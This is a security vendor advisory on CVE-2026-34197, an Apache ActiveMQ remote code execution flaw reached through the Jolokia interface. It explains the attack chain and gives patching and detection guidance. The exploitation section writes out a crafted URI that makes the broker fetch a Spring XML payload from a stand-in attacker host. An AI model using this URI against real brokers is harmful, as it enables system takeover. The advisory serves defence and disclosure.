Threat Advisories:
New Report Critical Threat Research : The Iranian Cyber War Intensifies! Download the Report

CVE-2026-34197: Jolokia Exposure Enables RCE in ActiveMQ

Red | Vulnerability Report
Download PDF
Summary

CVE-2026-34197 is a critical Apache ActiveMQ vulnerability first discovered on March 22, 2026, representing a high-impact security flaw that enables remote code execution through improper input validation in the Jolokia management interface. This CVE-2026-34197 vulnerability exposes how a well-intended security fix for a previous Apache ActiveMQ vulnerability (CVE-2022-41678) inadvertently introduced a far more dangerous attack path by loosening Jolokia access controls to preserve web console functionality. The CVE-2026-34197 vulnerability affects Apache ActiveMQ Broker and Apache ActiveMQ in all versions before 5.19.4, as well as versions 6.0.0 through 6.2.2. Attackers exploiting CVE-2026-34197 can chain this vulnerability with ActiveMQ’s VM transport mechanism and Spring XML processing capabilities to load malicious configurations and execute arbitrary commands on the broker, effectively taking complete control of the underlying system. The CVE-2026-34197 risk is especially severe in deployments using default credentials such as admin:admin, or in affected versions 6.0.0 through 6.1.1 where authentication is bypassed entirely due to a regression from CVE-2024-32114, turning CVE-2026-34197 into a low-effort, high-impact unauthenticated remote code execution vulnerability. With public proof-of-concept exploits already available for CVE-2026-34197 and clear parallels to the previously exploited CVE-2023-46604 ActiveMQ vulnerability involving malicious Spring XML loading, widespread exploitation of CVE-2026-34197 is highly likely and potentially imminent. The CVE-2026-34197 vulnerability has reportedly existed in the Apache ActiveMQ codebase for over 13 years, making it a long-overlooked security flaw that now poses immediate threat to organizations running vulnerable ActiveMQ instances.

Vulnerability Details

CVE-2026-34197 Root Cause: Overly Permissive Jolokia Access Policy

CVE-2026-34197 emerges as a high-impact vulnerability rooted in improper input validation and unsafe code generation practices that ultimately enable code injection in Apache ActiveMQ. The CVE-2026-34197 security issue has been hiding in plain sight within the ActiveMQ codebase for 13 years before discovery. At its core, the CVE-2026-34197 vulnerability traces back to an overly permissive Jolokia access policy introduced while addressing an earlier Apache ActiveMQ vulnerability tracked as CVE-2022-41678. Although that previous security fix aimed to harden Apache ActiveMQ security by restricting Jolokia to read-only operations and blocking access to sensitive JDK MBeans, it simultaneously introduced a broad “allow” rule for all ActiveMQ MBeans. This exception to the Jolokia access policy, intended to preserve web console functionality, inadvertently exposed critical management operations in CVE-2026-34197 including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String) methods to remote invocation via the Jolokia REST API, creating the foundation for remote code execution exploitation.

CVE-2026-34197 Exploitation Path: Chaining VM Transport with Spring XML

The CVE-2026-34197 exploitation path is particularly concerning due to its chaining of multiple independently developed Apache ActiveMQ components to achieve remote code execution. The addNetworkConnector method exposed by CVE-2026-34197, originally designed to dynamically establish broker-to-broker communication, can be abused in combination with ActiveMQ’s VM transport mechanism. This VM transport, originally intended for testing and lightweight embedded ActiveMQ use, automatically instantiates a broker instance if one does not already exist. More critically for CVE-2026-34197 exploitation, the VM transport accepts a brokerConfig parameter that allows configuration loading from external sources, including remote URLs controlled by attackers. By leveraging this CVE-2026-34197 behavior, an attacker can supply a crafted URI such as static:(vm://rce?brokerConfig=xbean:http://ATTACKER/payload.xml) to coerce the Apache ActiveMQ broker into fetching and processing a malicious configuration file hosted on attacker infrastructure.

CVE-2026-34197 Weaponization: Spring XML Remote Code Execution

The CVE-2026-34197 attack becomes fully weaponized through Apache ActiveMQ’s integration with the Spring Framework. The xbean: scheme used in CVE-2026-34197 exploitation instructs the ActiveMQ broker to interpret the remote resource as a Spring XML configuration, which is then processed by ResourceXmlApplicationContext. Because Spring Framework initializes all singleton beans before the ActiveMQ broker validates the configuration, a malicious XML payload delivered through CVE-2026-34197 can define beans that execute arbitrary commands via Runtime.exec() method invocation. This design flaw in the Spring XML processing effectively allows CVE-2026-34197 attackers to achieve remote code execution on the underlying Java Virtual Machine before any safety checks are enforced by ActiveMQ security controls, providing complete system compromise.

CVE-2026-34197 Affected Versions and Authentication Bypass

The CVE-2026-34197 vulnerability affects Apache ActiveMQ Broker and ActiveMQ in all versions before 5.19.4, as well as versions 6.0.0 through 6.2.2. While CVE-2026-34197 exploitation typically requires authentication to access the Jolokia management interface, the risk is significantly amplified in environments using default credentials such as the commonly deployed admin:admin credential pair. More critically for CVE-2026-34197 severity assessment, versions 6.0.0 through 6.1.1 inadvertently exposed the /api/* endpoint due to a regression tied to CVE-2024-32114, leaving the Jolokia interface completely unauthenticated. In such cases, CVE-2026-34197 can be exploited without any credentials whatsoever, significantly lowering the barrier to compromise and transforming this from an authenticated remote code execution to an unauthenticated remote code execution vulnerability with maximum severity implications.

CVE-2026-34197 Severity and Exploitation Likelihood

The CVE-2026-34197 vulnerability is network-accessible, requires minimal effort to exploit, and results in full system-level code execution, conditions that strongly suggest a high or critical severity rating once formally scored by vulnerability assessment frameworks. Notably, the CVE-2026-34197 issue has reportedly existed in the Apache ActiveMQ codebase for over a decade, demonstrating a long-overlooked security gap. The CVE-2026-34197 vulnerability mirrors the exploitation pattern seen in CVE-2023-46604, a widely abused ActiveMQ flaw involving malicious Spring XML loading that was actively exploited in the wild. With detailed technical write-ups and proof-of-concept exploits for CVE-2026-34197 already publicly available and documented, threat actors will likely operationalize this CVE-2026-34197 vulnerability in the immediate future, making urgent patching and mitigation critical for organizations running Apache ActiveMQ infrastructure.

Recommendations

Upgrade to Patched Apache ActiveMQ Versions Immediately

Organizations running Apache ActiveMQ Classic should upgrade to version 5.19.4 or 6.2.3 without delay to remediate CVE-2026-34197. The patch removes the ability for the addNetworkConnector operation to add vm:// transports through the Jolokia API, as this was never intended to be an externally accessible operation in Apache ActiveMQ. Prioritize this CVE-2026-34197 upgrade especially for internet-facing or DMZ-hosted broker instances that are exposed to untrusted networks. The patched versions represent the only complete mitigation for CVE-2026-34197 remote code execution vulnerability.

Eliminate Default Credentials on ActiveMQ Management Console

Audit all Apache ActiveMQ deployments for the use of default credentials, particularly the admin:admin credential pair commonly left unchanged on the web management console. Replace default credentials with strong, unique passwords that meet organizational password complexity requirements and enforce credential rotation policies to limit exposure windows. Since CVE-2026-34197 exploit requires authentication in most versions, removing default credentials significantly reduces the immediate attack surface and prevents opportunistic exploitation. Document all credential changes in secure password management systems.

Restrict Access to ActiveMQ Web Console and Jolokia Endpoint

The Apache ActiveMQ web management console (default port 8161) and its Jolokia API endpoint (/api/jolokia/) should never be exposed to untrusted networks or the public internet. Implement network-level access controls such as firewall rules, VPN requirements for administrative access, or IP allowlisting to limit access to authorized administrative personnel only. For cloud-hosted ActiveMQ deployments, configure security groups and network ACLs to restrict inbound connections to the management interface. This defense-in-depth approach prevents CVE-2026-34197 exploitation attempts from reaching vulnerable ActiveMQ instances.

Monitor ActiveMQ Broker Logs for CVE-2026-34197 Exploitation Indicators

Review Apache ActiveMQ broker logs for indicators of CVE-2026-34197 exploitation, including network connector activity referencing vm:// URIs with brokerConfig=xbean:http parameters, POST requests to /api/jolokia/ containing addNetworkConnector in the request body, unexpected outbound HTTP connections from the ActiveMQ broker process to external IP addresses, and unexpected child processes spawned by the ActiveMQ Java process. These patterns do not occur during normal broker operations and should be treated as high-fidelity indicators of compromise requiring immediate incident response investigation.

Assess Exposure of ActiveMQ 6.0.0 through 6.1.1 Deployments

Organizations running Apache ActiveMQ versions 6.0.0 through 6.1.1 should treat CVE-2026-34197 as an unauthenticated remote code execution vulnerability due to the compounding effect of CVE-2024-32114, which exposes the Jolokia endpoint without authentication on those specific versions. These deployments represent the highest risk profile and require the most urgent remediation attention. Immediately patch or isolate these systems from network access until patching can be completed. Consider these systems potentially compromised and conduct thorough security assessments before returning them to production.

MITRE ATT&CK TTPs

Initial Access

  • T1190: Exploit Public-Facing Application

Execution

  • T1059: Command and Scripting Interpreter
  • T1203: Exploitation for Client Execution

Command and Control

  • T1105: Ingress Tool Transfer

Resource Development

  • T1588: Obtain Capabilities (T1588.006: Vulnerabilities)
References

What’s new on HivePro

Get through updates and upcoming events, and more directly in your inbox